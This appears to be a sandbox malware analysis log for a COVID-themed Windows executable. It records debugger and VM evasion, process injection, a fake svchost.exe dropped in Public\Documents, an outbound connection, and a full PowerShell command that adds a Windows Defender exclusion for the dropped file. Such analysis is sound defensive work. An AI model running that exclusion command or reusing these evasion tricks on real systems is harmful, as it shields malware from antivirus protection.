      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Tries to delay execution (extensive OutputDebugStringW loop)Show sources
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeSection loaded: OutputDebugStringW count: 164
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6234
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 962
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3940
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3137
      Source: C:\Users\user\Desktop\New variant of covid 19.exe TID: 6512Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6892Thread sleep time: -12912720851596678s >= -30000s
      Source: C:\Users\user\Desktop\New variant of covid 19.exe TID: 6096Thread sleep time: -35000s >= -30000s
      Source: C:\Users\user\Desktop\New variant of covid 19.exe TID: 7156Thread sleep count: 40 > 30
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe TID: 6396Thread sleep time: -30000s >= -30000s
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe TID: 6620Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6656Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 6452Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6892Thread sleep time: -12912720851596678s >= -30000s
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\New variant of covid 19.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\New variant of covid 19.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: powershell.exe, 00000005.00000003.283722125.00000000053E3000.00000004.00000001.sdmpBinary or memory string: Hyper-V
      Source: New variant of covid 19.exe, 00000000.00000003.197444758.000000000598F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWX
      Source: svchost.exe, 00000012.00000002.602037143.00000213F4462000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
      Source: svchost.exe, 00000004.00000002.220716244.000001FF36740000.00000002.00000001.sdmp, New variant of covid 19.exe, 0000000A.00000002.752537813.0000000006450000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.295412409.000001A6FE080000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.748019320.0000017127540000.00000002.00000001.sdmp, svchost.exe, 0000001F.00000002.311377842.00000140F2340000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.334731017.000002B67C2B0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000014.00000002.739231496.0000000001095000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}=
      Source: New variant of covid 19.exe, 00000000.00000003.196962064.00000000059E2000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.600990755.00000213EEC29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: svchost.exe, 00000017.00000002.739609013.00000148EC202000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
      Source: svchost.exe, 00000004.00000002.220716244.000001FF36740000.00000002.00000001.sdmp, New variant of covid 19.exe, 0000000A.00000002.752537813.0000000006450000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.295412409.000001A6FE080000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.748019320.0000017127540000.00000002.00000001.sdmp, svchost.exe, 0000001F.00000002.311377842.00000140F2340000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.334731017.000002B67C2B0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: svchost.exe, 00000004.00000002.220716244.000001FF36740000.00000002.00000001.sdmp, New variant of covid 19.exe, 0000000A.00000002.752537813.0000000006450000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.295412409.000001A6FE080000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.748019320.0000017127540000.00000002.00000001.sdmp, svchost.exe, 0000001F.00000002.311377842.00000140F2340000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.334731017.000002B67C2B0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: svchost.exe, 00000017.00000002.739715392.00000148EC228000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.739177943.0000017126845000.00000004.00000001.sdmp, svchost.exe, 0000001A.00000002.741169171.000002075742A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: svchost.exe, 00000004.00000002.220716244.000001FF36740000.00000002.00000001.sdmp, New variant of covid 19.exe, 0000000A.00000002.752537813.0000000006450000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.295412409.000001A6FE080000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.748019320.0000017127540000.00000002.00000001.sdmp, svchost.exe, 0000001F.00000002.311377842.00000140F2340000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.334731017.000002B67C2B0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: powershell.exe, 00000005.00000003.283722125.00000000053E3000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
      Source: explorer.exe, 0000000E.00000002.739497998.0000000000F2C000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess information queried: ProcessInformation

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\New variant of covid 19.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess queried: DebugPort
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess queried: DebugPort
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess token adjusted: Debug
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess token adjusted: Debug
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\New variant of covid 19.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeNetwork Connect: 104.21.31.39 80
      Adds a directory exclusion to Windows DefenderShow sources
      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\user\Desktop\New variant of covid 19.exeMemory written: C:\Users\user\Desktop\New variant of covid 19.exe base: 400000 value starts with: 4D5A
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeMemory written: unknown base: 400000 value starts with: 4D5A
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeMemory written: unknown base: 400000 value starts with: 4D5A
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
      Source: C:\Users\user\Desktop\New variant of covid 19.exeProcess created: C:\Users\user\Desktop\New variant of covid 19.exe C:\Users\user\Desktop\New variant of covid 19.exe
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe' -Force
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: unknown unknown
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: unknown unknown
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: unknown unknown
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: unknown unknown
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: unknown unknown
      Source: C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
      Source: New variant of covid 19.exe, 0000000A.00000002.743642103.0000000001980000.00000002.00000001.sdmp, explorer.exe, 0000000E.00000002.742710009.0000000001670000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.741148189.0000000001750000.00000002.00000001.sdmp, svchost.exe, 00000019.00000002.741119110.0000018E5F590000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: New variant of covid 19.exe, 0000000A.00000002.743642103.0000000001980000.00000002.00000001.sdmp, explorer.exe, 0000000E.00000002.742710009.0000000001670000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.741148189.0000000001750000.00000002.00000001.sdmp, svchost.exe, 00000019.00000002.741119110.0000018E5F590000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: New variant of covid 19.exe, 0000000A.00000002.743642103.0000000001980000.00000002.00000001.sdmp, explorer.exe, 0000000E.00000002.742710009.0000000001670000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.741148189.0000000001750000.00000002.00000001.sdmp, svchost.exe, 00000019.00000002.741119110.0000018E5F590000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: New variant of covid 19.exe, 0000000A.00000002.743642103.0000000001980000.00000002.00000001.sdmp, explorer.exe, 0000000E.00000002.742710009.0000000001670000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.741148189.0000000001750000.00000002.00000001.sdmp, svchost.exe, 00000019.00000002.741119110.0000018E5F590000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\New variant of covid 19.exeQueries volume information: C:\Users\user\Desktop\New variant of covid 19.exe VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\New variant of covid 19.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
